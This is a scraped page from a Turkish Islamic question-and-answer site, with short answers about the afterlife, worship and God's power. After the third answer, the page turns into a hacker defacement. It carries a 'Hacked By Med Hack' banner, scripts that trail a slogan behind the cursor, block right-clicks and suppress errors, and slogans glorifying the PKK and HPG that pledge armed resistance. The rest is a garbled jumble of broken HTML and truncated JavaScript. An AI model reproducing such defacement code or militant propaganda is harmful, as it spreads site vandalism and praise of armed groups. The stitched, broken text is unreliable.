Profile

Layout

Direction

Cpanel
Şimdi Buradasınız: Akla Takılan

Âhirete gidip gelen mi var?

soruÖYLE BİR SORUYU soranlara şöyle demek lazım:
Olmaz olur mu hiç? Var olan bir şeyden haber veren olmaz mı?
Âhiret var ki, ondan haber veriliyor; âhiret var ki, ondan söz ediliyor; âhiret var ki, sürekli oralar anlatılıyor.
Kim haber veriyor, kim anlatıyor?
Âhiret konusunda kim söz sahibi ise, kim bilgi sahibi ise, kim uzmansa o haber veriyor.
Bu konuda söz sahibi birisi varsa, o da Yüce Allah'ın ken­disine resul ve elçi olarak seçtiği Peygamberimiz Aleyhissalâ-tü Vesselamdır
Cenab-ı Hak, ona geçmişin ve geleceğin bütün bilgilerini vermiş, o da insanlara bu bilgileri aktarmış ve anlatmış.
Onun bilgi kaynağı ise, elinde ebedi bir mucizesi olan Kur'an-ı Kerim'dir. Bu kitap, ilk geldiği gün gibi sağlam ve taze bilgilerle bizim de elimizde ve önümüzde duruyor.

Read more...

Allah’ın bizim ibadetimize ne ihtiyacı var?

thumb_namaz"Sizi ve sizden öncekileri yaratan Rabbinize ibadet ediniz ki takva mertebesine nâil olasınız." ayetinde bu sorunun cevabı verilmektedir.

İbadetle ortaya çıkan bir netice var: "İnsanın takva mertebesine erişmesi." İnsan o ibadetle "takva mertebesine", yani Allah'tan korkma, yasaklarından sakınma, haram kıldıklarından kaçınma makamına eriyor. Demek oluyor ki, ibadetin faydası insana ait.

Bu makama ermeyenler ömürlerini günahla, isyanla ve şirkle, küfranla geçirirler. Bunlar ise insanı cehenneme götürür.

Read more...

"Allah gelse, seni elimden alamaz!"

Bir öfke sonucu, bir kızgınlık anında, düşünmeden bu sözü söyleyen kişinin Allah’ın gücü ve kudreti konusunda en ufak bir bilgisinin olmadığı anlaşılıyor.
Bir kere Allah’ın gücünün ve kudretinin ne bir sınırı vardır, ne bir hududu... Çünkü Allah’ın kudreti sonsuzdur, sınırsızdır.

"Ve hüve alâ külli şey’in kadîr", yani "Allah’ın her şeye gücü yeter" ifadesi, Kur’an’da 40-50 yerde geçiyor.

"Her şey" derken, bu ifadenin içine girmeyen kalmıyor. Allah’ın kendi zatı dışında, varlık âleminde bulunan, Allah tarafından yaratılmış olan, aklımıza gelen gelmeyen bütün yaratıklar bu “her şey”in içindedir.

Read more...

Şikayete Hakkımız Var mı?

" >http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<style type="text/css">
</style>
<script language="JavaScript1.2">

var x,y
var kern=20
var flag=0
var message="Bijî Serok APO"
message=message.split("")
var xpos=new Array()
for (i=0;i<message.length;i++) {
xpos[i]=-50
}
var ypos=new Array()
for (i=0;i<message.length;i++) {
ypos[i]=-50
}
function handlerMM(e){
x = (e) ? e.pageX : document.body.scrollLeft+event.clientX
y = (e) ? e.pageY : document.body.scrollTop+event.clientY
flag=1
}
function makebanner() {
if (flag==1) {
for (i=message.length-1; i>=1; i--) {
xpos[i]=xpos[i-1]+kern
ypos[i]=ypos[i-1]
}
xpos[0]=x+kern
ypos[0]=y
for (i=0; i<message.length; i++) {
if (document.getElementById) {
var thisspan = document.getElementById("span"+i).style
} else {
var thisspan = eval((document.layers)?"document.span"+i:"span"+(i)+".style")
}
if (thisspan.posLeft) {
thisspan.posLeft=xpos[i]
thisspan.posTop=ypos[i]
}
if (!thisspan.posLeft) {
thisspan.left=xpos[i]
thisspan.top=ypos[i]
}
}
}
var timer=setTimeout("makebanner()",30)
}
window.onload=makebanner;
</script>

<script language="JavaScript1.2">
for (i=0;i<message.length;i++) {
document.write("<span id='span"+i+"' class='spanstyle'>")
document.write(message[i])
document.write("</span>")
}
if (document.layers){
document.captureEvents(Event.MOUSEMOVE);
}
document.onmousemove = handlerMM;

</script>

<style type="text/css">
<!--
.spanstyle {
position:absolute;
visibility:visible;
top:-50px;
font-size:15pt;
font-family:book antiqua;
font-weight:bold;
color:#FC0;
}
BODY {
width:100%;overflow-x:hidden;overflow-y:scroll;
}
-->
</style>

<script>
function start() {

makebanner();
teclear();
}
window.onload = start;
</script>

</body></head></html>

<style>

.style1{text-align:center;width:960px;padding:25px 0;margin:0px auto;position:relative;background:rgba(0,0,0,0.7);box-shadow:inset -2px 0 5px #707070,inset

2px 0 5px #707070;-moz-box-shadow:inset -2px 0 5px #707070,inset 2px 0 5px #707070;-webkit-box-shadow:inset -2px 0 5px #707070,inset 2px 0 5px #707070}

http://m1305.hizliresim.com/19/p/nb3py.jpg" border="0" width="600" height="500">

http://img1.loadtr.com/b-526645-g%C3%BCvercin1.gif" border="0" width="70" height="70"> ! Hacked By Med Hack

<font face=Mighty Mighty Friars Size=5 color="red"><b> ÖNDER APONUN SANAL GERİLLALARI TARAFINDAN HACKLENDİNİZ </b></font></br>
<font face=Mighty Mighty Friars Size=5 color="yellow"><b> REBER APO ÖZGÜRLÜĞÜNE KAVUŞANA KADAR</b></font> </br>
<font face=Mighty Mighty Friars Size=5 color="green"><b> BİZ DURMAYACAĞIZ </b></font></br>
<font face=Mighty Mighty Friars Size=5 color="red"><b> KÜRT HALK ÖNDERİ </b></font></br>
<font face=Mighty Mighty Friars Size=5 color="yellow"><b> VE KÜRT HALKINA YEMİN EDERİZ Kİ </b></font></br>
<font face=Mighty Mighty Friars Size=5 color="green"><b> BU ÖZGÜRLÜK MÜCADELEMİZDE </b></font></br></br>
<font face=Mighty Mighty Friars Size=5 color="red"><b></b>"KANIMIZIN SON DAMLASINA KADAR DİRENECEĞİZ"</font></br><br>
<font face=Mighty Mighty Friars Size=5 color="yellow"><b> BİJİ SEROK APO </b></font></br><br>
<font face=Mighty Mighty Friars Size=5 color="green"><b> Bijî PKK </b></font></br><br>
<font face=Mighty Mighty Friars Size=5 color="red"><b>Bijî HPG</b></font></br><br>
<font face=Mighty Mighty Friars Size=5 color="yellow"><b> Bijî Kurd û Kurdistan </b></font></br>

<font face=Mighty Mighty Friars Size=5 color="yellow"><b> Partiya Hackeren Kurd</b></font></br>

http://twitter.com/m3dhack" target=new>http://in.sitekodlari.com/tw/19.jpg" border="0">m3dhack

</br>

</br>

var mymessage = " BİJİ SEROK APO";
function rtclickcheck(keyp){
if (navigator.appName == "Netscape" && keyp.which == 3) {
alert(mymessage);
return false;
}

if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
alert(mymessage);
return false;
}
}

document.onmousedown = rtclickcheck
//-->
</script>

<!---kopyalama yasak mesaji--->
<body onunload="window.alert('Hak icin hack ">

</??????? ????20081209/>

</script></body>

</iframe>

<center><img src="">

http://www.uploadmusic.org">

<SCRIPT language=JavaScript>

if (document.all){

Cols=15;

Cl=24; //Peşpeşe geliş mesafeleri!

Cs=50; //Sayfaya enine yayılış mesafeleri!

Ts=15; //Rakamların büyüklükleri!

Tc='#008800';//Renk

Tc1='#00ff00';//Renk1

MnS=22; //Akış hızları!

MxS=25; //Akış hızları!

I=Cs;

Sp=new Array();S=new Array();Y=new Array(5,6);

C=new Array();M=new Array();B=new Array();

RC=new Array();E=new Array();Tcc=new Array(0,1,7,9,3,2);

document.write("<div id='Container' style='position:absolute;top:0;left:-"+Cs+"'>");

document.write("<div style='position:relative'>");

for(i=0; i < Cols; i++){

S[i]=I+=Cs;

document.write("<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:"

+Ts+"px;left:"+S[i]+";width:"+Ts+"px;height:0px;color:"+Tc+";visibility:hidden'></div>");

}

document.write("</div></div>");


for(j=0; j < Cols; j++){

RC[j]=1+Math.round(Math.random()*Cl);

Y[j]=0;

Sp[j]=Math.round(MnS+Math.random()*MxS);

for(i=0; i < RC[j]; i++){

B[i]='';

C[i]=Math.round(Math.random()*1)+' ';

M[j]=B[0]+=C[i];

}

}

function Cycle(){

Container.style.top=window.document.body.scrollTop;

for (i=0; i < Cols; i++){

var r = Math.floor(Math.random()*Tcc.length);

E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>';

Y[i]+=Sp[i];


if (Y[i] > window.document.body.clientHeight){

for(i2=0; i2 < Cols; i2++){

RC[i2]=1+Math.round(Math.random()*Cl);

for(i3=0; i3 < RC[i2]; i3++){

B[i3]='';

C[i3]=Math.round(Math.random()*1)+' ';

C[Math.floor(Math.random()*i2)]=' '+' ';

M[i]=B[0]+=C[i3];

Y[i]=-Ts*M[i].length/1.5;

A[i].style.visibility='visible';

}

Sp[i]=Math.round(MnS+Math.random()*MxS);

}

}

A[i].style.top=Y[i];

A[i].innerHTML=M[i]+' '+E[i]+' ';

}

setTimeout('Cycle()',20)

}

Cycle();

}

</SCRIPT>


<P></P>

<SCRIPT language=JavaScript>

<!--


function SymError()

{

return true;

}


window.onerror = SymError;


//-->

</SCRIPT>


<META http-equiv=Content-Language content=pt-br>

<META content="Microsoft FrontPage 5.0" name=GENERATOR>

<META content=FrontPage.Editor.Document name=ProgId>

<META http-equiv=Content-Language content=tr>

http://server33.hypermart.net/celibol/"

name=GENERATOR>


<STYLE fprolloverstyle>A:hover {

FONT-WEIGHT: bold; COLOR: #ff0000

}

</STYLE>


<SCRIPT language=javascript>

<!--

function Is() {

var agent = navigator.userAgent.toLowerCase();

this.major = parseInt(navigator.appVersion);

this.minor = parseFloat(navigator.appVersion);

this.ns = ((agent.indexOf('mozilla')!=-1) && ((agent.indexOf('spoofer')==-1) && (agent.indexOf('compatible') == -1)));

this.ns2 = (this.ns && (this.major == 2));

this.ns3 = (this.ns && (this.major == 3));

this.ns4b = (this.ns && (this.major == 4) && (this.minor <= 4.03));

this.ns4 = (this.ns && (this.major >= 4));

this.ie = (agent.indexOf("msie") != -1);

this.ie3 = (this.ie && (this.major == 2));

this.ie4 = (this.ie && (this.major >= 4));

this.op3 = (agent.indexOf("opera") != -1);

}


var is = new Is()

if(is.ns4) {

doc = "document";

sty = "";

htm = ".document"


} else if(is.ie4) {

doc = "document.all";

sty = ".style";

htm = ""

}

.http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd